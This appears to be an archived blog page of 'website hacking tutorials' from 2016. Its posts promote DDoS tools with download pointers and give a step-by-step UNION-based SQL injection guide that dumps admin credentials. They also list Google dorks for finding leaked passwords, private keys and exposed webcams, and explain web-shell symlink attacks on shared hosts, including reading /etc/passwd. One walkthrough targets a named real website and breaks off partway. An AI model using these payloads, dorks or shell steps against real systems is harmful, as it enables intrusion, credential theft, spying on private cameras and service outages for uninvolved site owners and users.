Showing posts with label Website Hacking Tutorials. Show all posts
Showing posts with label Website Hacking Tutorials. Show all posts

Sunday, 22 May 2016

New DDoS Tools For Pc 2016

Methods

You can categorize denial-of-service attacks into at least three different types, which include:
  1. Volume-Based
These are the simplest attacks. The attacker simply sends a large volume of packets to the target thereby using up all the resources. The resources used might simply be bandwidth. These attacks include ICMP and UDP floods.
  1. Protocol-Based
These attacks often use the server's resources rather than bandwidth going to and from of the server. They can also use the resources of the network equipment on the periphery of the server (such a firewalls, intrusion detection systems, and switches). Examples include Smurf attacks (ICMP to a broadcast IP with a spoofed IP), Fraggle attacks (same as the Smurf, only using UDP), SYN floods, ping of deaths (oversized ICMP with the same destination and source IP and port), and many others.
  1. Application Layer Attacks
These attacks are compromised of what appear to be legitimate application layer (layer 7) requests to the server that are intended to crash it. These include attacks on Apache HTTP Server and Microsoft IIS, and includes tools such as Slowloris.

DoS & DDoS Tools


                                                              DOWNLOAD

Free Common DDoS Tools For Pc 2016

The denial of service (DOS) attack is one of the most powerful attacks used by hackers to harm a company or organization. Don’t confuse a DOS attack with DOS, the disc operating system developed by Microsoft. This attack is one of most dangerous cyber attacks. It causes service outages and the loss of millions, depending on the duration of attack. In past few years, the use of the attack has increased due to the availability of free tools. This tool can be blocked easily by having a good firewall. But a widespread and clever DOS attack can bypass most of the restrictions. In this post, we will see more about the DOS attack, its variants, and the tools that are used to perform the attack. We will also see how to prevent this attack and how not to be the part of this attack.
What Is a Denial of Service Attack?
A DOS attack is an attempt to make a system or server unavailable for legitimate users and, finally, to take the service down. This is achieved by flooding the server’s request queue with fake requests. After this, server will not be able to handle the requests of legitimate users.
In general, there are two forms of the DOS attack. The first form is on that can crash a server. The second form of DOS attack only floods a service.
DDOS or Distributed Denial of Service Attack
This is the complicated but powerful version of DOS attack in which many attacking systems are involved. In DDOS attacks, many computers start performing DOS attacks on the same target server. As the DOS attack is distributed over large group of computers, it is known as a distributed denial of service attack.
To perform a DDOS attack, attackers use a zombie network, which is a group of infected computers on which the attacker has silently installed the DOS attacking tool. Whenever he wants to perform DDOS, he can use all the computers of ZOMBIE network to perform the attack.
In simple words, when a server system is being flooded from fake requests coming from multiple sources (potentially hundreds of thousands), it is known as a DDOS attack. In this case, blocking a single or few IP address does not work. The more members in the zombie network, more powerful the attack it. For creating the zombie network, hackers generally use a Trojan.
There are basically three types of DDOS attacks:
  1. Application-layer DDOS attack
  2. Protocol DOS attack
  3. Volume-based DDOS attack
Application layer DDOS attack: Application-layer DDOS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.
Protocol DDOS attack: A protocol DDOS attacks is a DOS attack on the protocol level. This category includes Synflood, Ping of Death, and more.
Volume-based DDOS attack: This type of attack includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.
There are many tools available for free that can be used to flood a server and perform an attack. A few tools also support a zombie network to perform DDOS attacks. For this post, we have compiled a few freely available DOS attacking tools.
Free DOS Attacking Tools

1. LOIC (Low Orbit Ion Canon)
LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.
It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.
Image 1: Low Orbit Ion Canon
You can see the snapshot of the tool above. Enter the URL or IP address and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.
This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.
The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.
Download LOIC here:

2. XOIC
XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.
Image 2: XOIC
In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.
It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.
3. HULK (HTTP Unbearable Load King)
HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.
It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.
The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.
4. DDOSIM—Layer 7 DDOS Simulator
DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.
This tool is written in C++ and runs on Linux systems.
These are main features of DDOSIM
  • Simulates several zombies in attack
  • Random IP addresses
  • TCP-connection-based attacks
  • Application-layer DDOS attacks
  • HTTP DDoS with valid requests
  • HTTP DDoS with invalid requests (similar to a DC++ attack)
  • SMTP DDoS
  • TCP connection flood on random port
Read more about this tool here:http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/
5. R-U-Dead-Yet
R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.
6. Tor’s Hammer
Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.
Download TOR’s Hammer here: http://packetstormsecurity.com/files/98831/
7. PyLoris
PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.
8. OWASP DOS HTTP POST
It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.
9. DAVOSET
DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.
10. GoldenEye HTTP Denial Of Service Tool
GoldenEye is also a simple but effective DOS attacking tool. It was developed in Python for testing DOS attacks, but people also use it as hacking tool.
Detection and Prevention of Denial of Service Attack
A DOS attack is very dangerous for an organization, so it is important to know and have a setup for preventing one. Defenses against DOS attacks involve detecting and then blocking fake traffic. A more complex attack is hard to block. But there are a few methods that we can use to block normal DOS attack. The easiest way is to use a firewall with allow and deny rules. In simple cases, attacks come from a small number of IP addresses, so you can detect those IP addresses and then add a block rule in the firewall.
But this method will fail in some cases. We know that a firewall comes at a very deep level inside the network hierarchy, so a large amount of traffic may affect the router before reaching the firewall.
Blackholing and sinkholing are newer approaches. Blackholing detects the fake attacking traffic and sends it to a black hole. Sinkholing routes all traffic to a valid IP address where traffic is analyzed. Here, it rejects back packets.
Clean pipes is another recent method of handling DOS attacks. In this method, all traffic is passed through a cleaning center, where, various methods are performed to filter back traffic. Tata Communications, Verisign, and AT&T are the main providers of this kind of protection.
As an Internet user, you should also take care of your system. Hackers can use your system as a part of their zombie network. So, always try to protect your system. Always keep your system up to date with the latest patches. Install a good antivirus solution. Always take care while installing software. Never download software from un-trusted or unknown sources. Many websites serve malicious software to install Trojans in the systems of innocent users.

Monday, 16 May 2016

DDOS Explained Fully

DDoS is short for Distributed Denial oService.
DDoS is a type of DOS attack where multiple compromised systems, which are often infected with a Trojan, are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack.

How DDoS Attacks Work

According to this report on eSecurityPlanet, in a DDoS attack, the incoming traffic flooding the victim originates from many different sources – potentially hundreds of thousands or more. This effectively makes it impossible to stop the attack simply by blocking a single IP address; plus, it is very difficult to distinguish legitimate user traffic from attack traffic when spread across so many points of origin.

The Difference Between DoS and DDos Attacks

A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.

Types of DDoS Attacks

There are many types of DDoS attacks. Common attacks include the following:
  • Traffic attacks: Traffic flooding attacks send a huge volume of TCP, UDP and ICPM packets to the target. Legitimate requests get lost and these attacks may be accompanied by malware exploitation.
  • Bandwidth attacks: This DDos attack overloads the target with massive amounts of junk data. This results in a loss of network bandwidth and equipment resources and can lead to a complete denial of service.
  • Application attacks: Application-layer data messages can deplete resources in the application layer, leaving the target's system services unavailable.

Friday, 13 May 2016

Manual SQL Injection Explained Fully May 2016

Many guys said that they can’t understand SQLI method as its a bit hard.and its really very hard to understand without knowing the knowledge of SQL and its very hard to inject malacious code into url and get a web site data base.so here we made this tutorial with easy steps.hope you will all get it and like itit

What is SQL Injection ?
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Requirements :-
SQL Injection Dorks.
Vulnerable Website. (Use Google to find SQL Injection Vulnerable Website)
Firefox with Hack bar add-on.
Little bit understanding of SQL Injection and URL
Fresh Mind to Understand it.
Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection
Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be
easily found in SQL Injection Vulnerable Website URL)
Search it on Google for Eg. these are few SQL Injection Vulnerable Dorks. :-
___________
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________
Use Google to search Vulnerable websites.
Acutally what you have to do is , go on google and type :
inurl : index.php?id=1(or 2 or 3 or any number you like)
You will get a list of websites . Choose one .
For Eg. www.targetwebsite.com/
index.php?id=8
Make sure that at last the URL has som syntax like this : index.php?id=2(or any other
number)
How to Check for Vulnerability.
Open any website URL related to SQL Injection Dorks.
Put Single Quote at the End of the website URL ( ' )
Note :- To Check the Vulnerability put single Quote ( ' ) at the end of the website URL and Hi
Enter.
For Eg. www.targetwebsite.com/index.php?id=2'
If the page remains same or Not found then it's not vulnerable and if the page shows Error like
this :-
An error occurred...
You have an error in your SQL syntax; check th manual that corresponds to your MySQL server
version for the right syntax to use near ''/contentPage.php?id=8''' at line 1
or
An error occurred...
You have an error in your SQL syntax; check th manual that corresponds to your MySQL server
version for the right syntax to use near ''' at line 1
This means the website is vulnerable to SQL Injection.
Step 2. Find the number of Columns.
Woh!! We found SQL Injection Vulnerable webstie now it's time to find no. of Columns present in
the Database.
To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the
Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown
Column"
For Example :- Change it's Order By 1,2,3,4 lik below :-
www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3
www.targetwebsite.com/index.php?id=8 Order by 4
www.targetwebsite.com/index.php?id=8 Order by 5
And Suppose above Method won't work then use below method :-
www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?id=8 order by 3--
If you get an Error on Order by 9 that means th DB have 8 number of Columns and If you had
found error on Order by 6 then the DB have 5 number of Columns. We mean if you put Order by
12 and Suppose the DB have only 11 no. of Columns then Website will show Error like this :-
An error occurred...
Unknown column '12' in 'order clause'
This trick is actually used to find the number of Columns in DB. Understand the Below example
and you will get to know.
www.targetwebsite.com/index.php?id=8 Order by 1 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 2 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 3 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 4 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 5 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 6 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 7 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 8 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 9 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 10 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 11 (No Error)
www.targetwebsite.com/index.php?id=8 Order by 12 (Error)
Here, our Vulnerable website Showed Error on Order by 12 that means our Vulnerable website
have 11 number of columns in it's DB.
So now here we found number of columns in my DB :-
Number of Columns = 11
Step 3. Find the Vulnerable Column.
Basically if the website is vulnerable then it have vulnerability in it's column and now it's time to
find out that column.
Well we have successfully discovered number of columns present in Database. let us find
Vulnerable Column by using the Query "Union Select columns_sequence".
And also change the ID Value to Negative, we mean Suppose the website have this URL
index.php?id=8 Change it to index.php?id=-8. Just put minus sign "-" before ID value.
For Eg. If the Number of Column is 11 then the query is as follow :-
www.targetwebsite.com/index.php?id=-8
union select 1,2,3,4,5,6,7,8,9,10,11--And Suppose
above Method won't work then use below method:-www.targetwebsite.com/index.php?id=-8 and
1=2 union select 1,2,3,4,5,6,7,8,9,10,11--
And Once if the Query has been Executed then it will display the number of Columns.
In the Above result, we found three vulnerable Columns 2,3 and 4.
Let us take 2 as our tutorial.
Well... ! We found Vulnerable Columns, Now Next Step.
Step 4. Finding version, Database and User.
Now its time to find out website Database version and User
Just replace Vulnerable Column no. with "version()"
For Eg.
www.targetwebsite.com/index.php?id=-8
union select 1,version(),3,4,5,6,7,8,9,10,11--
And now Hit Enter : and you will get result.
Now again do the same , replace Vulnerable column with different query like :- database(),
user()For Eg.
www.targetwebsite.com/index.php?id=-8
union select 1,version(),3,4,5,6,7,8,9,10,11--
www.targetwebsite.com/index.php?id=-8
union select 1,database(),3,4,5,6,7,8,9,10,11-
www.targetwebsite.com/index.php?id=-8
union select 1,user(),3,4,5,6,7,8,9,10,11--
And Suppose above Method won't work then use below method :-
www.targetwebsite.com/index.php?id=-8 and 1=2 union select
1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11
Step 5. Finding the Table name.
Here we found vulnerable Column, DB , Version name and User . Now it's time to get the Table
name.
If the database version is 4 or above then you gave to guess the table name (Blind SQL Injection
attack)
Let us find now Table name of the Database, Same here Replace Vulnerable Column number
with "group_concat(table_name) and add the "from information_schema.tables where
table_schema=database()"
For Eg.
www.targetwebsite.com/index.php?id=-8
union select
1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where
table_schema=database()--
Now hit Enter and you can see Complete Table of Database.
Great we found Table name now find the table name that is related to admin or user .
When we performed this on our target website we got to know that there is one table name :-
userDatabase. Let us choose that table userdatabase and Go on Next step.
Step 6. Finding the Column name.
Now same to find Column names, replace "group_concat(table_name) with
"group_concat(column_name)"
and Replace the "from information_schema.tables where table_schema=database()--" with
"FROM information_schema.columns WHERE table_name=mysqlchar—
Note :- Do not hit Enter now.... First of all Convert
table name into Mysql Char String()
Install the Hackbar add-on in Firefox
After Installing you can see the toolbar, and if you can't then Hit F9.Select sql->Mysql-
>MysqlChar() in the Hackbar.
Enter the Table name you want to convert it int Mysql Char
Now you can see the Char like this :-
Copy and paste the code at the end of the url instead of the "mysqlchar"
For Eg.
www.targetwebsite.com/index.php?id=-8
union select
1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE
table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--
And Now Hit Enter and you will be able to see the Column names .
Great Here we found Username and Password Column .
Step 7. Explore Database & Hack it.
Cool......! Now you know the next step what to do ..... get the ID and Password of Admin user
using this Command into URL.Now replace group_concat(column_name) with
group_concat(username,0x2a,password). or any other Column name you want to get Data.
For Eg.
http://targetwebsite.com/index.php?id=-8 and 1=2 union select
1,group_concat(username,0x2a,password),3,4,5,6,7,8,9,10,1 from userDatabase—
If the above Command doesn't work then use Column name from first and put all Columns at one
time and you will be able to get the complete database.
Best of Luck!

Sunday, 27 March 2016

Use Google to Find Facebook And Other Backups Password 2016

In order for these to work, all you have to do is
simply copy and paste the dork into Google and
search it
Method 1: Facebook!
We will be using a Google dork to find
usernames and passwords of many accounts
including Facebook!
The Dork: intext:charset_test= email= default_
persistent=
Enter that into Google, and you will be presented
with several sites that have username and
passwords lists!
Method 2: WordPress!
This will look for WordPress backup files Which
do contain the passwords, and all data for the
site!
The Dork: filetype ql inurl:wp-content/
backup-*
Method 3: WWWBoard!
This will look for the user and passwords of
WWWBoard users
The Dork: inurl:/wwwboard/passwd.txt
Method 4: FrontPage!
This will find all users and passwords, similar to
above.
The Dork: ext:/wd inurl:/service | authors |
administrators | users) "# -FrontPage-"
Method 5Symfony: !
This finds database information and logins
The Dork: inurl:config/databases.yml -trac -trunk
-"Google Code" -source -repository
Method 6: TeamSpeak! (big one!!!!!)
This will search for the server.dbs file (a Sqlite
database file With the SuperAdmin username
and password!!!)
The Dork: server-dbs "intitle:IntelexXx of"
Method 7: TeamSpeak2!!! (also big!)
This will find the log file which has the Super
Admin user and pass in the Top 100 lines. Look
for "superadmin account info:"
The Dork: "inurl:Teamspeak2_RC2/server.log"
Method 8: Get Admin pass!
Simple dork which looks for all types of admin
info
The Dork: "admin account info" filetype:log
Method 9: Private keys! (not any more!)
This will find any .pem files which contain
private keys.
The Dork: filetype:pem pem intext:private
And the Ultimate one, the regular directory full
of passwords....
Method 10: The Dir of Passwords!
Simple one!
The Dork: intitle:"IntelexXx of..etc" passwd

Saturday, 19 March 2016

How to Hack CCTV And Webcam With Google

Only Copy And Paste That Keyword On Google
Search Box:-

inurl:”CgiStart?page=”
inurl:/view.shtml
intitle:”Live View/ — AXIS”
inurl:iview/view.shtml
inurl:ViewerFrame?M0de=
inurl:ViewerFrame?M0de=Refresh
inurliaxis-cgi/jpg
inurliaxis-cgi/mjpg (motion-JPEG)
(disconnected)
inurl:view/indexFrame.shtml
inurliview/index.shtml
inurliview/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitleiliveapplet
allintitle:”Network Camera
NetworkCamera” (disconnected)
intitleiaxis intitle:”video server”
intitleiliveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View/ — AX|S”
intitle:”Live View/ — AXIS 206M”
inti’r|e”‘l ive View / — AXIS 706W”
intitle:”Live View/ — AXIS 210?
inurl:indexFrame.shtml Axis
inurl1″MultiCameraFrame?
Mode=Motion” (disconnected)
intitleistart inurl:cgistart
intitle:”WJ-NTI 04 Main Page”
intitleisnc-220 inurl:home/
intitleisnc-cs3 inurl:home/
intitleisnc-r230 inurl:home/
intitle:”sony network camera snc-pl ?
intitle:”sony network camera snc-ml ?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user Iogin
intitle:”netcam live image” (disconnected)
intitle:”i-Catcher Console — Web Monitor”
And Many Other:-
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/
view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”
inurl:"viewerframe?mode="
inurl:"axis-cgi/mjpg"
inurl:"/view/index.shtml"
intitle:liveapplet
inurl:lvappl
cgi-bin/video.jpg?size=2
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”
intitle:axis
intitle:axis camera
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml "Axis Video Server"
inurl:"axis-cgi/mjpg"
inurl:"ViewerFrame?Mode="
inurl:"ViewerFrame?Mode=Motion"
inurl:"view/index.shtml"
inurl:"MultiCameraFrame?Mode="
inurl:"video.cgi=" inurl:axis
inurl:"video.cgi?showlength=1"
inurl:"view/indexFrame.shtml"
"axis-cgi/jpg"
"view/indexFrame.shtml"
"view/view.shtml"
"video.cgi?resolution="
inurl:axiscam.net "AXIS"
inurl:axiscam.net "Live view"
inurl:mjpg/video.cgi
"MOBOTIX M1" and "open menu"
intext:"MOBOTIX M1"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"
intext:"Open Menu"
intitle:snc-rz30
intitle:"snc-rz30 home"
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
intitle:"TOSHIBA Network Camera - User Login"
intitle:toshiba inurl:user_single_view.htm
intitle:liveapplet inurl:LvAppl
"CgiStart?page=Single"
inurl:dyndns.org inurl:index.shtml
inurl:dyndns.org Axis|Mobotix
intitle:"Linksys Web Camera" "ver"
"Kamerainformationen anzeigen"
inurl:image?cachebust=
inintitle:"supervisioncam protocol"
title:flexwatch intext:"Copyright by Seyeon TECHCo"
intitle:”Live NetSnap Cam-Server feed”
inurl:LvAppl intitle:liveapplet
"Powered by webcamXP"
-inurl:htm -inurl:html inurl:ViewerFrame
-inurl:htm -inurl:html inurl:webcam.php
camera linksys inurl:main.cgi
allintitle:Brains
Corp. camera
inurl:LvAppl intitle:liveapplet
"Powered by webcamXP"
intitle:flexwatch
intext:"Copyright by Seyeon TECHCo"
intitle:"WJ-NT104 Main"
intitle:"WJ-NT104 Main Page"
intitle:"WV-NP244"
sample/LvAppl/
inurl:home/homeJ.html
inurl:main/flashLogin.html
inurl:next_file=main_fs.htm
inurl:/login.ml
"Webthru User Login"
"Please enter username and password to log into system"
inurl:Ctl/index.htm?Cus
Configuration "Pop-up Live Image"
inurl:"*.viewnetcam.com"
inurl:Remote/index.php3
intitle:Live Video
"ViewerFrame?Mode="
liveapplet
"inurl:MultiCameraFrame?Mode="
netw_tcp.shtml
"indexFrame.shtml?newstyle=Quad"
"/showcam.php?camid"
"image?cachebust="
"live view"
intitle:liveapplet
allintitle:Network Camera NetworkCamera
intitle:video server
intitle:"supervisioncam protocol"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:start inurl:cgistart
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"
site:.viewnetcam.com -www.viewnetcam.com"V.Networks [Motion Picture(Java"
inurl:/app/idxas.html

Thursday, 17 March 2016

How to Hack The Non-Vulnerable Sites 2016

Lets start
No DDoS. If your target website is not vulnerable, but you really want to hack it, you could do a IP lookup on this website: <!-- m --><a class="postlink" href="http://www.yougetsignal.com/tools/web-si...b-server/">http://www.yougetsignal.com/tools/web-si...b-server/</a><!-- m -->. How to get the IP of your target? Open up cmd (Run->cmd.exe or in Vista/7 press 'Start button' and in the search bar enter cmd, then click it) and type 'ping targethost.com'. Targethost.com is your target of course. You will see something like this: Pinging it-sec.biz [204.236.239.5] with 32 bytes of data:. In the brackets ([]) you can see the remote IP. Now enter it on the given website (above). You will get every website that is hosted on the server (same hosting). It makes you the job much easier, because the chances of hacking your target website are much bigger. You need to exploit only one of them to get to your target. If you managed to upload a shell to one of these websites, you can be 80% sure that you got your target, of course if it uses a SQL Database (Uses every Forum, Blog and other CMS's.)
After you uploaded a shell, upload this great php script coded by the UrduHack Team called 'symlink_urduhack.php' . It creates a symlink to your target website.
So you need to know what CMS your target is running and you need to know where the config file is located. For example in MyBB it is located in 'inc/config.php', in vBulletin it is located in 'includes/config.php'. In the uploaded shell (not on your target host, on the website you did it) run a command: cat /etc/passwd
This Unix command will display you the contents of the passwd file located in the etc folder. That means, every user on the system. If your target's website is 'forumpowered.com' (example) you need to search in the /etc/passwd file something with 'forum' or 'forumpow'. If you find something like this, you can be sure it is your target. Use CTRL+F for fast search.
Once you found it, go to the shell home (to the directory where the shell was uploaded) and look for the path in the top. It will be something like this: /home/[namehere]/public_html/. Copy it to notepad, and replace your username with your targets one, 'forumpow' (example). Open the uploaded file 'symlink_urduhack.php' in your browser and paste there the path from notepad. It will create a symlink to the target website. Click the symlink0 hyperlink. If everything worked fine, you will be able to see all files on the target site. (Even read). But it does not work always, so let's create a direct symlink to the configuration file, so you can connect to the database and read the contents.
Let's imagine, the target forum is running vBulletin and you need to get the content of the config files. You would enter this: /home/forumpow/public_html/includes/config.php. Would create a direct symlink to this file. Now you can use your SQL Manager on your shell to connect to the database.
Now, maybe the most hard part is decrypting the passwords... You can follow this tut or you can simply update the password and salt with already cracked ones and login with it.
Thank you for reading!

How to Hack Vulnerability Sites With Sqli Injection 2016

1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION
2) UPLOADING SHELL
3) DEFACE/HACK IT
---------------------------------------------------------------------------------------------------------------------------------

step 1 :
 find a sql vulnerable site ! for finding a site to hack u will need google.com we will use google dork to find sites dork will be INURL: the task of this dork iss to find the giving words in URL ADDRESSES so it will find the giving words in website's url address bar goto google.com type this inurl:news.php?nws= this search will show the sites having the page of news.php?nws= now you got so many result at page ! now open 1st site like mine is http://www.area96.it/news.php?nws=61 now we will check if this site is vulnerbale to sql injection or not ! just add ' this at the end of site url address ! http://www.area96.it/news.php?nws=61'
nothing change ? try to add before number http://www.area96.it/news.php?nws=%2761 still nothing happened ? http://www.area96.it/news.php?nws"61 if still nothing happened to page the leave the site and move to next site ! but luckly i dont need to move to next site this site is vulnerable http://www.area96.it/news.php?nws=61' by adding this ' the result of page changed ! now you can see this msg on page !
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean this site can be hack !
---------------------------------------------------------------------------------------------------------------------------------

step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !
http://scan.subhashdasyam.com/admin-panel-finder.php
now we will paste the site link there
which is http://www.area96.it/
and click on dump!
it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
---------------------------------------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean there is no 7 column in this !
so there are 6 column !
